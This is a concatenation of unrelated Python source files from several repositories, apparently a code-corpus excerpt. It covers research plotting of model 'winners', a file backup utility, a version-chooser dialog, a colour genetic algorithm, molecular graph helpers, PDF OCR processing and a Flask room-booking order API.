        del model_dict["Exemplar (s=1)"] # no longer including base exemplar
    if "Exemplar (s=0.1)" in model_dict:
        del model_dict["Exemplar (s=0.1)"]
    if "Exemplar (s=0.001)" in model_dict:
        del model_dict["Exemplar (s=0.001)"]
    if "2NN" in model_dict:
        del model_dict["2NN"]
    if "3NN" in model_dict:
        del model_dict["3NN"]
    if "4NN" in model_dict:
        del model_dict["4NN"]
    if "5NN" in model_dict:
        del model_dict["5NN"]
    if not include_null:
        del model_dict["Null"]
    # Seed every scientist (taken from an arbitrary model's keys) with
    # (-inf, None) so any real score wins.
    scientists_to_models = {k: (-float("inf"), None) for k in model_dict[list(model_dict.keys())[0]]}
    if len_included:
        for model in model_dict:
            for scientist in model_dict[model]:
                if not dict_format:
                    # tuple-format records: [0]=value, [1]=p-value or length
                    if p_vals and model_dict[model][scientist][1] * len(scientists_to_models) > 0.05:
                        # fails Bonferroni-corrected significance
                        continue
                    if p_vals:
                        val = model_dict[model][scientist][0]
                    else:
                        if model == "Null":
                            continue
                        if model_dict[model][scientist][1] < 5:
                            # too few papers: remove the scientist entirely
                            if scientist in scientists_to_models:
                                del scientists_to_models[scientist]
                            continue
                        val = model_dict[model][scientist][0]
                    if val > scientists_to_models[scientist][0]:
                        scientists_to_models[scientist] = (val, [model])
                    elif val == scientists_to_models[scientist][0]:
                        # tie: record every co-winning model
                        scientists_to_models[scientist][1].append(model)
                else:
                    # dict-format records
                    if p_vals and model_dict[model][scientist]["p-val"] > 0.05:
                        continue
                    if model_dict[model][scientist]["num_papers"] < 5:
                        continue
                    win_ratio = model_dict[model][scientist]["win_ratio"]
                    if win_ratio > scientists_to_models[scientist][0]:
                        scientists_to_models[scientist] = (win_ratio, [model])
                    if win_ratio == scientists_to_models[scientist][0]:
                        scientists_to_models[scientist][1].append(model)
        if include_null:
            # non-positive best scores fall back to the Null model
            scientists_to_models = {k: v if v[0] > 0 else (0, ["Null"]) for k, v in scientists_to_models.items()}
    else:
        # simple format: the record is the score itself
        for model in model_dict:
            for scientist in model_dict[model]:
                val = model_dict[model][scientist]
                if val > scientists_to_models[scientist][0]:
                    scientists_to_models[scientist] = (val, [model])
                elif val == scientists_to_models[scientist][0]:
                    scientists_to_models[scientist][1].append(model)
        if include_null:
            scientists_to_models = {k: v if v[0] > 0 else (0, ["Null"]) for k, v in scientists_to_models.items()}
    return scientists_to_models
def get_pairwise_differences(model_dict: dict, p_vals=True, include_null=True) -> dict:
    """Rank scientists by the gap between their best and second-best model.

    WARNING(review): this function is in a debugging state -- it prints
    intermediate results, saves a scatter plot, and hits `assert False`
    before the return statement ever runs. The hard-coded indices [0]
    ('1NN') and [8] ('progenitor'?) assume a fixed model insertion order.
    NOTE(review): mutates *model_dict* when include_null is False.
    """
    if not include_null:
        del model_dict["Null"]
    scientists_to_models = {k: [] for k in model_dict['1NN']}
    # collect (record, model) pairs per scientist
    for model in model_dict:
        for scientist in model_dict[model]:
            scientists_to_models[scientist].append((model_dict[model][scientist], model))
    gaps = []
    all_1NN = []
    all_progenitor = []
    for scientist in scientists_to_models:
        # sort this scientist's models best-first by score record
        model_performance = sorted([i for i in scientists_to_models[scientist]], key=lambda x: x[0], reverse=True)
        # (best - runner-up score, best model, scientist)
        gaps.append((model_performance[0][0][0] - model_performance[1][0][0], model_performance[0][1], scientist))
        #print(scientists_to_models[scientist])
        all_1NN.append((scientists_to_models[scientist][0][0][0], scientists_to_models[scientist][0][0][1]))
        all_progenitor.append((scientists_to_models[scientist][8][0][0], scientists_to_models[scientist][8][0][1]))
    advantage_1NN = sorted([i for i in gaps if i[1] == "1NN"], key=lambda x:x[0], reverse=True)
    advantage_progenitor = sorted([i for i in gaps if i[1] == "Prototype"], key=lambda x:x[0], reverse=True)
    rank_1NN, scientists = zip(*(sorted(all_1NN, key=lambda x:x[0])))
    print(advantage_1NN[:5])
    print(advantage_progenitor[:5])
    rank_1NN, num_papers = zip(*all_1NN)
    print(rank_1NN)
    print(num_papers)
    rank_prog, num_papers_p = zip(*all_progenitor)
    # correlation between paper counts and model performance
    print(pearsonr(num_papers, rank_1NN))
    print(pearsonr(num_papers_p, rank_prog))
    plt.scatter(num_papers, rank_prog)
    plt.savefig("num_papers_vs_prototype_dominance")
    # debug guard: everything below is currently unreachable
    assert False
    return advantage_1NN, advantage_progenitor
def make_pie_chart(scientists_to_models, include_null=True, len_included=False, filename="trial-pie") -> dict:
    """Plot (and save) a pie chart of how often each model 'wins'.

    *scientists_to_models* maps scientist -> (score, [winning model(s)]);
    ties contribute fractionally. Returns the model -> fraction dict.
    """
    percentages = {}
    plt.gcf().clear()
    for scientist in scientists_to_models:
        # no winning model recorded for this scientist
        if scientists_to_models[scientist][1] is None:
            continue
        if not include_null and scientists_to_models[scientist][1][0] == "Null":
            continue
        if len(scientists_to_models[scientist][1]) == 1:
            if scientists_to_models[scientist][1][0] not in percentages:
                percentages[scientists_to_models[scientist][1][0]] = 1
            else:
                percentages[scientists_to_models[scientist][1][0]] += 1
        else:
            # tie: split one unit of weight across the co-winners
            for mod in scientists_to_models[scientist][1]:
                if mod not in percentages:
                    percentages[mod] = 1/len(scientists_to_models[scientist][1])
                else:
                    percentages[mod] += 1/len(scientists_to_models[scientist][1])
    num_not_null = len(scientists_to_models)
    print(num_not_null)
    if not include_null:
        # renormalize over scientists with a non-Null winner only
        num_not_null = len([v for k, v in scientists_to_models.items() if v[1] is not None and v[1][0] != "Null"])
    percentages = {k: v / num_not_null for k, v in percentages.items()}
    #if "Exemplar" in percentages:
        #percentages["Exemplar (s=0.01)"] = percentages["Exemplar"]
        #del percentages["Exemplar"]
    print(sorted(list(percentages.items()), key=operator.itemgetter(1), reverse=True))
    # wedge order and colors come from the module-level `order`/`colours`
    percent_sorted = sorted(list(percentages.items()), key=lambda x: order[x[0]])
    plt.pie([i[1] for i in percent_sorted], labels=[i[0] for i in percent_sorted], autopct='%1.1f%%', colors=[colours[key[0]] for key in percent_sorted], pctdistance=0.7, textprops={'fontsize': 10})
    #plt.legend(patches, , loc="best")
    plt.tight_layout()
    if filename is not None:
        plt.savefig(filename + ".png")
        plt.savefig(filename + ".eps")
    return percentages
if __name__ == "__main__":
    # NOTE(review): the pickle path and the output filename disagree
    # (medicine-crp vs "cs-random") -- likely leftovers from ad-hoc runs.
    models = pickle.load(open("results/summary/full/medicine-crp.p", "rb"))
    # models_2 = pickle.load(open("results/full-2/medicine.p", "rb"))
    # models_3 = pickle.load(open("results/full-2/economics.p", "rb"))
    # models_4 = pickle.load(open("results/full-2/chemistry.p", "rb"))
    # models_5 = pickle.load(open("results/full-2/cs.p", "rb"))
    # for key in models:
    #     models[key].update(models_2[key])
    #     models[key].update(models_3[key])
    #     models[key].update(models_4[key])
    #     models[key].update(models_5[key])
    # set len_included=False for authorship analysis
    percent = make_pie_chart(get_winners(models, p_vals=False, include_null=True, len_included=True, dict_format=False), include_null=True, filename="cs-random")
    # debug guard: the pairwise analysis below never runs
    assert False
    get_pairwise_differences(models, include_null=False)
    #make_pie_chart(models)
| 8,565 |
azazel/api/models/__init__.py
|
agata-project/azazel
| 4 |
2022993
|
from .course import Course
from .event import Event
from .user import User
from .talk import Talk, Workshop, Keynote
from .user_talk import UserTalk
| 149 |
VERSION_3/CREAR_TXT_BACKUP.py
|
san99tiago/AUTOMATIZACION-PROYECTOS-EMPRESA-ARQUITECTURA
| 0 |
2023337
|
# -*- coding: utf-8 -*-
##La linea superior se encarga de poder hacer encoding con reconocimiento de tildes y enne
#CODIGO PARA CREAR ARCHIVO TXT COMO BACKUP DE LOS REGISTROS EN LA CARPETA DONDE SE GUARDAN EXCELS
#Libreria para manejar la lectura correcta de los archivos TXT
import glob
import INFO_DIR_ACTUAL
class CREAR_TXT_BACKUP:
    """Copy REGISTROS.txt into the current save folder as REGISTROS_BACKUP.txt."""

    def __init__(self):
        # Locate the registry file in the working directory
        # (IndexError if it is missing -- TODO confirm that is acceptable).
        self.archivo = glob.glob("REGISTROS.txt")[0]
        self.nuevo_txt()

    def nuevo_txt(self):
        # NUEVO_TXT accumulates every line of the registry file.
        NUEVO_TXT = ""
        # Open the TXT in read mode; it holds project info and all records.
        txt = open( self.archivo, "r")
        # Read per line (easier to filter the info).
        info_lineas = txt.readlines()
        # Inspect each line separately.
        for line in info_lineas:
            # try/except guards against malformed lines (e.g. stray blank
            # "enter" lines) during accumulation.
            try:
                NUEVO_TXT = NUEVO_TXT + line
            # Swallow read/decoding problems (e.g. empty lines).
            except:
                pass
        txt.close()
        # --------- write the backup into the destination save folder ---------
        CARPETA_GUARDAR = INFO_DIR_ACTUAL.CREACION_CARPETA()
        path_guardar = CARPETA_GUARDAR.devolver_ruta_guardado() + "\\REGISTROS_BACKUP.txt"
        # Open the destination TXT in write mode and dump the copied content.
        txt = open( path_guardar, "w")
        txt.write(NUEVO_TXT)
        txt.close()
#-----------------------------------------------------------------------------------------------------------------------------------
#PRUEBA DE ESCRITORIO
# TEST1 = CREAR_TXT_BACKUP()
| 2,144 |
ui/curses/versionchooser.py
|
adpoliak/NSAptr
| 0 |
2023604
|
"""
Copyright 2016 adpoliak
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from distutils.version import LooseVersion
from sortedcontainers.sortedset import SortedSet
# import curses
# import os
# import sys
import typing
class VersionItem(object):
    """Read-only wrapper holding one selectable version's display name."""

    def __init__(self, name: str):
        self._name = name

    @property
    def name(self):
        """The wrapped name (read-only)."""
        return self._name
class VersionChoiceDialog(object):
    """UI-independent state object backing the version-chooser dialog.

    Tracks the selected version plus three tri-state flags (``persist``,
    ``keep_while_available``, ``do_not_ask_again``) where ``None`` means
    the option is currently disabled.

    Fix: ``select_action`` previously assigned ``self.persist = False``
    twice; the duplicated assignment now resets ``keep_while_available``
    instead, mirroring the flag handling in ``persist_action``.
    """

    @property
    def chosen_version(self):
        return self._chosen_version

    @property
    def do_not_ask_again(self):
        return self._do_not_ask_again

    @do_not_ask_again.setter
    def do_not_ask_again(self, value: bool):
        self._do_not_ask_again = value

    @property
    def keep_while_available(self):
        return self._keep_while_available

    @keep_while_available.setter
    def keep_while_available(self, value: bool):
        self._keep_while_available = value

    @property
    def persist(self):
        return self._persist

    @persist.setter
    def persist(self, value: bool):
        self._persist = value

    @property
    def return_code(self):
        return self._return_code

    @return_code.setter
    def return_code(self, value: str):
        self._return_code = value

    def persist_action(self):
        """Toggle 'persist'; enabling it forces the other flags off,
        disabling it makes them unavailable (None)."""
        if self.persist is not None:
            self.persist ^= True
            if self.persist:
                self.keep_while_available = False
                self.do_not_ask_again = False
            else:
                self.keep_while_available = None
                self.do_not_ask_again = None

    def update_persist_state(self):
        """'persist' is unavailable while either other flag is set."""
        if self.keep_while_available or self.do_not_ask_again:
            self.persist = None
        else:
            self.persist = False

    def keep_action(self):
        """Toggle 'keep while available' and refresh persist availability."""
        if self.keep_while_available is not None:
            self.keep_while_available ^= True
            self.update_persist_state()

    def noprompt_action(self):
        """Toggle 'do not ask again' when the option is available."""
        if self.do_not_ask_again is not None:
            self.do_not_ask_again ^= True

    def select_action(self):
        """Record the highlighted version and reset the option flags."""
        self._chosen_version = list(self._child_names)[self._index]
        if self.chosen_version.endswith(':KEEP'):
            # sentinel entry: selection cannot be accepted, options disabled
            self._can_continue = False
            self.persist = None
            self.keep_while_available = None
            self.do_not_ask_again = None
        else:
            self._can_continue = True
            self.persist = False
            # was a duplicated `self.persist = False`; reset the keep flag
            # like every other flag-reset path in this class
            self.keep_while_available = False
            self.do_not_ask_again = False

    def cancel_action(self):
        self.return_code = 'cancel'

    def accept_action(self):
        # only a real (non-:KEEP) selection can be accepted
        if self._can_continue:
            self.return_code = 'accept'

    def __init__(self, master: typing.Optional[object], versions: SortedSet,
                 persist: typing.Optional[bool] = False, keep: typing.Optional[bool] = False,
                 last_used: typing.Optional[str] = None, *args, **kwargs):
        # assign tkinter-compatible interface items to placeholder to placate PyCharm
        _ = master
        _ = args
        _ = kwargs
        self._can_continue = None
        self._child_names = SortedSet(versions)
        self._child_objects = None
        self._chosen_version = None
        self._do_not_ask_again = False
        self._keep_while_available = keep
        self._last_used = last_used
        self._return_code = None
        self._persist = persist
        self._index = 0
        if persist:
            self.persist_action()
        if keep:
            self.keep_action()
        if last_used is not None:
            # pre-select the previously used version when still offered
            last_used_version_object = LooseVersion(last_used)
            self._index = self._child_names.index(last_used_version_object) \
                if last_used_version_object in self._child_names else 0
        self.select_action()
| 4,308 |
12. Iteration and generators/Generators.py
|
riyabhatia26/Python-Programming
| 3 |
2022762
|
from builtins import set
def take(count, iterable):
    """Yield at most *count* leading items from *iterable*."""
    for position, value in enumerate(iterable):
        if position == count:
            return
        yield value
def distinct(iterable):
    """Yield each value of *iterable* once, preserving first-seen order."""
    emitted = set()
    for value in iterable:
        if value not in emitted:
            emitted.add(value)
            yield value
def run_pipeline():
    """Print the first three distinct values from a sample list."""
    items = [3, 6, 2, 1, 1]
    # distinct() already yields lazily; wrapping it in list() materialized
    # the whole sequence for no benefit, defeating the generator pipeline.
    for item in take(3, distinct(items)):
        print(item)
run_pipeline()
# Graphical debugger
# Control flow is easier to see in graphical debugger
| 549 |
gencolors/genetics.py
|
ExcaliburZero/genetic-colors
| 0 |
2023801
|
from random import gauss, randint
import numpy as np
GOAL = (52, 152, 219)
MUTATION_CHANCE = 20
MUTATION_DEVIATION = 5
REPLACE_RATE = 1.1


def score_chromosome(self):
    """Fitness error: sum of per-channel absolute distances from GOAL
    (lower is better)."""
    return sum(abs(channel - target) for channel, target in zip(self, GOAL))
def mate_chromosome(self, other):
    """Cross two (r, g, b) chromosomes: red and blue from *self*, green
    from *other*, then mutate one random channel with probability
    1/(MUTATION_CHANCE + 1)."""
    child = np.array([self[0], other[1], self[2]])
    if randint(0, MUTATION_CHANCE) == 0:
        deltas = [0, 0, 0]
        # pick the channel first, then draw the change (same RNG call
        # order as the original implementation)
        channel = randint(0, 2)
        deltas[channel] = random_change()
        mutate_chromosome(child, deltas)
    return child
def random_change():
    """Draw a mutation delta from a Gaussian N(0, MUTATION_DEVIATION)."""
    return gauss(0, MUTATION_DEVIATION)
def bound(value, lower_lim, upper_lim):
    """Clamp *value* into the inclusive range [lower_lim, upper_lim]."""
    if value > upper_lim:
        return upper_lim
    if value < lower_lim:
        return lower_lim
    return value
def mutate_chromosome(self, changes):
    """In place: add *changes* to each channel, clamped to [0, 255]."""
    for channel in range(3):
        self[channel] = bound(self[channel] + changes[channel], 0, 255)
def create_population(num):
    """Return *num* random individuals stacked into one ndarray."""
    return np.array([create_individual() for _ in range(num)])
def create_individual():
    """Random RGB chromosome: ndarray of three ints, each in [0, 255],
    drawn in red, green, blue order."""
    channels = [randint(0, 255) for _ in range(3)]
    return np.array(channels)
def next_generation(population):
    """Keep the fittest ~1/REPLACE_RATE chromosomes and refill the remainder
    with children bred from those survivors."""
    scores = np.array([score_chromosome(c) for c in population])
    # Lower score == closer to GOAL, so the front of the sort is the fittest.
    positions = np.argsort(scores)
    sorted_population = population[positions]
    midpoint = int(sorted_population.shape[0] / REPLACE_RATE)
    survivors = sorted_population[:midpoint]
    num_children = sorted_population.shape[0] - survivors.shape[0]
    children = create_children(survivors, num_children)
    new_population = np.concatenate([survivors, children])
    return new_population
def create_children(survivors, num_children):
    """Breed *num_children* offspring from randomly paired survivor rows."""
    last = survivors.shape[0] - 1
    pairs = [(randint(0, last), randint(0, last)) for _ in range(num_children)]
    return np.array([mate(survivors, pair) for pair in pairs])
def mate(survivors, parents):
    """Cross the two survivor rows indexed by the *parents* pair into one child."""
    first, second = parents
    return mate_chromosome(survivors[first], survivors[second])
| 2,320 |
automechanic_old/ipyx2z/geom.py
|
avcopan/automechanic-history-save
| 0 |
2024250
|
""" Geometry-based interface to pyx2z
"""
import numpy
import pyx2z
def graph(mgeo, res=0):
    """ molecule graph of a cartesian geometry, for resonance index *res*
    """
    return resonance_graphs(mgeo)[res]
def number_of_resonance_graphs(mgeo):
    """ number of resonances
    """
    graphs = resonance_graphs(mgeo)
    return len(graphs)
def resonance_graphs(mgeo):
    """ molecule graphs of a cartesian geometry, one per resonance structure

    Each graph is (atom-symbols, bonds) where bonds is a frozenset of
    (frozenset{i, j}, bond-order) pairs.
    """
    x2zms = _pyx2z_molec_struct(mgeo)
    natms = x2zms.size()
    nrncs = x2zms.resonance_count()
    atms, _ = zip(*mgeo)
    mgrphs = []
    for ridx in range(nrncs):
        bnds = frozenset()
        # Scan the lower triangle of the atom-pair matrix for bonds.
        for i in range(natms):
            for j in range(i):
                order = x2zms.bond_order(i, j, ridx)
                if order > 0:
                    # A bond is the unordered pair of atom indices.
                    bnd = frozenset([i, j])
                    bnds |= frozenset([(bnd, order)])
        mgrphs.append((atms, bnds))
    return tuple(mgrphs)
def radical_sites(mgeo):
    """ radical sites of a molecule, as a tuple of atom indices
    """
    molec = _pyx2z_molec_struct(mgeo)
    return tuple(atom_idx for atom_idx in range(molec.size())
                 if molec.is_radical(atom_idx))
def _pyx2z_molec_struct(mgeo):
    """ build a pyx2z MolecStruct from a cartesian geometry """
    return pyx2z.MolecStruct(_pyx2z_prim_struct(mgeo))
def _pyx2z_prim_struct(mgeo):
    """ build a pyx2z PrimStruct from a cartesian geometry """
    return pyx2z.PrimStruct(_pyx2z_molec_geom(mgeo))
def _pyx2z_molec_geom(mgeo):
    """ convert an (atom-symbol, xyz) sequence to a pyx2z MolecGeom """
    molec_geom = pyx2z.MolecGeom()
    for symbol, coords in mgeo:
        molec_geom.push_back(_pyx2z_atom(symbol, coords))
    return molec_geom
def _pyx2z_atom(asymb, xyz):
    """ build a pyx2z Atom at *xyz* (angstrom), stored internally in bohr """
    ang2bohr = 1.8897259886
    atom = pyx2z.Atom(asymb)
    atom[0], atom[1], atom[2] = numpy.multiply(xyz, ang2bohr)
    return atom
| 1,705 |
froide/document/pdf_utils.py
|
kratz00/froide
| 0 |
2024416
|
import contextlib
from PyPDF2 import PdfFileReader
from PIL import Image as PILImage
import wand
from wand.image import Image
try:
import tesserocr
except ImportError:
tesserocr = None
try:
import pdflib
except ImportError:
pdflib = None
TESSERACT_LANGUAGE = {
'en': 'eng',
'de': 'deu'
}
class PDFProcessor(object):
    """Reads a PDF file: page count, metadata, rendered page images and text,
    falling back to Tesseract OCR for pages without an embedded text layer."""
    def __init__(self, filename, language=None, config=None):
        # *language* is a key of TESSERACT_LANGUAGE; *config* may provide
        # TESSERACT_DATA_PATH for the OCR engine.
        self.filename = filename
        self.pdf_reader = PdfFileReader(filename)
        self.num_pages = self.pdf_reader.getNumPages()
        self.language = language
        self.config = config or {}
    def get_meta(self):
        """Return basic document metadata (currently only the title)."""
        doc_info = self.pdf_reader.getDocumentInfo()
        return {
            'title': doc_info.title
        }
    def get_images(self, pages=None, resolution=300):
        """Yield a rendered wand Image per page (all pages by default).

        Each yielded image is only valid for the current iteration step:
        it is closed when the underlying context manager exits.
        """
        if pages is None:
            pages = range(self.num_pages)
        for page_no in pages:
            with self.get_image(page_no, resolution=resolution) as img:
                yield img
    @contextlib.contextmanager
    def get_image(self, page_no, resolution=300):
        """Context manager rendering page *page_no* to a wand Image."""
        # "file.pdf[3]" is ImageMagick's syntax for selecting one page.
        filename = "{}[{}]".format(self.filename, page_no)
        with Image(
                filename=filename,
                resolution=resolution,
                background=wand.color.Color('#fff')) as img:
            img.alpha_channel = False
            yield img
    def get_text(self, pages=None):
        """Yield the stripped text of each requested page.

        Prefers pdflib when available, falls back to PyPDF2 extraction,
        and finally to OCR when a page yields no text at all.
        """
        if pages is None:
            pages = range(self.num_pages)
        pdflib_pages = None
        if pdflib is not None:
            pdflib_doc = pdflib.Document(self.filename)
            pdflib_pages = list(pdflib_doc)
        for page_no in pages:
            if pdflib_pages is not None:
                page = pdflib_pages[page_no]
                text = ' '.join(page.lines).strip()
            else:
                page = self.pdf_reader.getPage(page_no)
                text = page.extractText()
            if not text.strip():
                # No embedded text layer on this page: try OCR instead.
                text = self.ocr_page(page_no)
            yield text.strip()
    def ocr_page(self, page_no):
        """OCR a single page; returns '' when tesserocr is unavailable."""
        if tesserocr is None:
            return ''
        with self.get_image(page_no, resolution=300) as img:
            pil_image = PILImage.frombytes('RGB', img.size, img.make_blob('RGB'))
            return tesserocr.image_to_text(
                pil_image,
                lang=TESSERACT_LANGUAGE[self.language],
                path=self.config.get('TESSERACT_DATA_PATH', '')
            )
    def run_ocr(self, timeout=180):
        """Run the project's external OCR pipeline over the whole file."""
        from froide.helper.document import run_ocr
        output_bytes = run_ocr(
            self.filename,
            language=TESSERACT_LANGUAGE[self.language],
            timeout=timeout
        )
        return output_bytes
    def save_pages(self, path, **kwargs):
        """Render pages to image files and yield each written filename.

        *path* is a format string containing ``{page}`` (1-based numbering).
        """
        for page, img in enumerate(self.get_images(**kwargs), 1):
            filename = path.format(page=page)
            img.save(filename=filename)
            yield filename
def crop_image(image_path, left, top, width, height):
    """Cut a (width x height) region at (left, top) out of the image file
    and return it encoded as GIF bytes."""
    with Image(filename=image_path) as img:
        img.alpha_channel = False
        right, bottom = left + width, top + height
        img.crop(left, top, right, bottom)
        return img.make_blob('gif')
| 3,171 |
aoc/utils/parsers.py
|
rmenai/advent-of-code
| 0 |
2023345
|
from typing import Any, Callable, Optional, Union
from aocd import get_data as _get_data
from aoc.core import settings
def get_data(year: int, day: int, func: Optional[Callable[[str], Any]] = None,
             split: Optional[Union[bool, str]] = False) -> Any:
    """Get and clean the data for a specific Advent of Code day.
    Args:
        year (int): The event year.
        day (int): The challenge day.
        func (Callable): A function to call for each line (or the entire
            input if not splitting). Default is None.
        split (bool, optional): The character(s) to split the input by,
            or True to split by newlines. Defaults to False.
    """
    raw_data = _get_data(year=year, day=day, session=settings.aoc_session)
    if split is False:
        # No splitting requested: optionally transform the whole input.
        return func(raw_data) if func else raw_data
    # Split on the given separator string, or on newlines otherwise.
    lines = raw_data.split(split) if isinstance(split, str) else raw_data.splitlines()
    if func:
        lines = [func(line) for line in lines]
    return lines
| 1,206 |
ihome/modules/api/order.py
|
sexlovelove/info
| 1 |
2024366
|
import datetime
from ihome import db, sr
from ihome.models import House, Order, User
from ihome.utils.common import login_required
from ihome.utils.response_code import RET
from . import api_blu
from flask import request, g, jsonify, current_app
# Book a room
@api_blu.route('/orders', methods=['POST'])
@login_required
def add_order():
    """
    Place an order:
    1. collect parameters
    2. validate parameters
    3. check the requested house exists
    4. reject booking when the logged-in user owns this house
    5. check the requested dates do not clash with existing orders
    6. build the Order model and persist it
    7. return the result
    :return: JSON with errno/errmsg (and the new order id on success)
    """
    # 1. collect parameters
    user_id = g.user_id
    house_id = request.json.get("house_id")
    start_date = request.json.get("start_date")
    end_date = request.json.get("end_date")
    # 2. validate parameters
    if not all([house_id, start_date, end_date]):
        return jsonify(errno=RET.PARAMERR, errmsg="参数不足")
    if not user_id:
        return jsonify(errno=RET.SESSIONERR, errmsg="用户未登录")
    # Parse the date strings into datetime objects
    try:
        start_date = datetime.datetime.strptime(start_date, "%Y-%m-%d")
        end_date = datetime.datetime.strptime(end_date, "%Y-%m-%d")
    except Exception as e:
        current_app.logger.error(e)
        return jsonify(errno=RET.PARAMERR, errmsg="格式错误")
    # BUGFIX: the stay must end after it starts; the original comparison was
    # inverted (<=) and rejected every valid date range.
    if start_date >= end_date:
        return jsonify(errno=RET.PARAMERR, errmsg="格式错误")
    # BUGFIX: number of nights as an int (the original kept a timedelta,
    # which breaks `days * house.price` below).
    days = (end_date - start_date).days
    # 3. check the requested house exists
    try:
        house = House.query.get(house_id)
    except Exception as e:
        current_app.logger.error(e)
        return jsonify(errno=RET.DBERR, errmsg="数据库查询错误")
    if not house:
        return jsonify(errno=RET.NODATA, errmsg="无房屋可预定")
    # 4. BUGFIX: compare the owner of THIS house to the logged-in user (the
    # original matched any house owned by the user, blocking all landlords).
    if house.user_id == user_id:
        return jsonify(errno=RET.PARAMERR, errmsg="房主是登录用户")
    # 5. check for date conflicts with this house's existing orders
    conflict = False
    for house_order in house.orders:
        # Overlap when an existing order begins or ends inside the new range.
        if (start_date <= house_order.begin_date < end_date) or \
                (start_date < house_order.end_date < end_date):
            conflict = True
            break
    if conflict:
        return jsonify(errno=RET.PARAMERR, errmsg="无法预定")
    # 6. build the Order model and persist it
    order = Order()
    order.user_id = user_id
    order.house_id = house_id
    order.begin_date = start_date
    order.end_date = end_date
    order.days = days
    order.house_price = house.price
    order.amount = days * house.price
    order.status = "WAIT_ACCEPT"
    try:
        db.session.add(order)
        db.session.commit()
    except Exception as e:
        current_app.logger.error(e)
        db.session.rollback()
        return jsonify(errno=RET.DBERR, errmsg="保存数据库异常")
    # 7. return the new order id
    return jsonify(errno=RET.OK, errmsg="成功", data=order.id)
# Fetch the current user's orders
@api_blu.route('/orders')
@login_required
def get_orders():
    """
    1. query orders belonging to the logged-in user, as guest or landlord
    2. return them as a list of dictionaries
    :return: JSON with an "orders" list in data
    """
    # Make sure the user is logged in
    user_id = g.user_id
    if not user_id:
        return jsonify(errno=RET.SESSIONERR, errmsg="用户尚未登录")
    # Load the user record
    try:
        user = User.query.get(user_id)
    except Exception as e:
        current_app.logger.error(e)
        return jsonify(errno=RET.DBERR, errmsg="数据库查询错误")
    if not user:
        return jsonify(errno=RET.NODATA, errmsg="用户不存在")
    # Which role is asking: "custom" (guest) or "landlord"
    role = request.args.get("role")
    if not role:
        return jsonify(errno=RET.PARAMERR, errmsg="参数不足")
    if role not in ("custom", "landlord"):
        return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
    if role == "custom":
        # Guest view: all orders placed by this user.
        # (Dropped the original's dead `order_list = []` assignment that was
        # immediately overwritten.)
        orders = user.orders or []
        order_dict_list = [order.to_dict() for order in orders]
    else:
        # Landlord view: orders placed against any house this user owns.
        houses_id_list = [house.id for house in user.houses]
        landlord_orders = Order.query.filter(
            Order.house_id.in_(houses_id_list)).order_by(Order.create_time).all()
        order_dict_list = [order.to_dict() for order in (landlord_orders or [])]
    data = {
        "orders": order_dict_list
    }
    return jsonify(errno=RET.OK, errmsg="ok", data=data)
# Accept / reject an order
@api_blu.route('/orders', methods=["PUT"])
@login_required
def change_order_status():
    """
    1. read parameters: order_id, action (and reason when rejecting)
    2. look up the order, which must still be awaiting acceptance
    3. update its status
    4. commit to the database
    :return: JSON with errno/errmsg
    """
    # 1. read parameters
    user_id = g.user_id
    action = request.json.get("action")
    order_id = request.json.get("order_id")
    if not user_id:
        return jsonify(errno=RET.NODATA, errmsg="请登录")
    if not all([order_id, action]):
        return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
    if action not in ("accept", "reject"):
        return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
    # 2. find the order that is still waiting to be accepted
    try:
        order = Order.query.filter(Order.id == order_id,
                                   Order.status == "WAIT_ACCEPT").first()
    except Exception as e:
        current_app.logger.error(e)
        return jsonify(errno=RET.DBERR, errmsg="未查询到数据")
    # BUGFIX: guard against a missing order — the original fell through and
    # dereferenced None on `order.status`.
    if not order:
        return jsonify(errno=RET.NODATA, errmsg="未查询到数据")
    # 3. update the status
    if action == "accept":
        order.status = "WAIT_PAYMENT"
    else:
        # Rejection requires a reason, stored in the order's comment field.
        reason = request.json.get("reason")
        if not reason:
            return jsonify(errno=RET.NODATA, errmsg="原因为空")
        order.comment = reason
        order.status = "REJECTED"
    # 4. commit
    try:
        db.session.commit()
    except Exception as e:
        db.session.rollback()
        current_app.logger.error(e)
        return jsonify(errno=RET.DBERR, errmsg="数据保存失败")
    # 5. done
    return jsonify(errno=RET.OK, errmsg="OK")
# Comment on an order
@api_blu.route('/orders/comment', methods=["PUT"])
@login_required
def order_comment():
    """
    Review a completed stay:
    1. read parameters (order_id and comment come from the request body)
    2. validate them and load the matching order
    3. update the order and house, then commit
    :return: JSON with errno/errmsg

    BUGFIX: the view previously declared an ``order_id`` parameter although
    the route has no ``<order_id>`` converter, so Flask raised a TypeError
    on every request; the id is read from the JSON body instead.
    """
    # 1. read parameters
    param_dict = request.json
    comment = param_dict.get("comment")
    order_id = param_dict.get("order_id")
    user_id = g.user_id
    # 2. validate
    if not comment:
        return jsonify(errno=RET.PARAMERR, errmsg="请输入评论内容")
    # Only an order still awaiting review may be commented on.
    try:
        order = Order.query.filter(Order.id == order_id,
                                   Order.status == "WAIT_COMMENT").first()
    except Exception as e:
        current_app.logger.error(e)
        return jsonify(errno=RET.DBERR, errmsg="查询订单数据错误")
    # BUGFIX: check the order exists before touching order.house — the
    # original raised AttributeError (masked as a DB error) on a missing order.
    if not order:
        return jsonify(errno=RET.NODATA, errmsg="不存在该订单")
    house = order.house
    if not house:
        return jsonify(errno=RET.NODATA, errmsg="不存在该订单")
    # 3. update the models
    # Mark the order complete and store the review text.
    order.status = "COMPLETE"
    order.comment = comment
    # Bump the house's completed-order counter.
    house.order_count += 1
    try:
        db.session.commit()
    except Exception as e:
        current_app.logger.error(e)
        db.session.rollback()
        return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
    # Invalidate the cached house details (best effort).
    try:
        sr.delete("house_info_%s" % house.id)
    except Exception as e:
        current_app.logger.error(e)
    return jsonify(errno=RET.OK, errmsg="OK", data=comment)
| 7,574 |
callbacks/watch.py
|
xinetzone/self-driving-dash
| 0 |
2023183
|
import pandas as pd
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
from dash import callback_context
from utils.client import plot_frame, Canvas
from tools.frame import Shape
from app import app
from layouts.watch import stream
@app.callback(
    Output('frame-slider', 'value'),
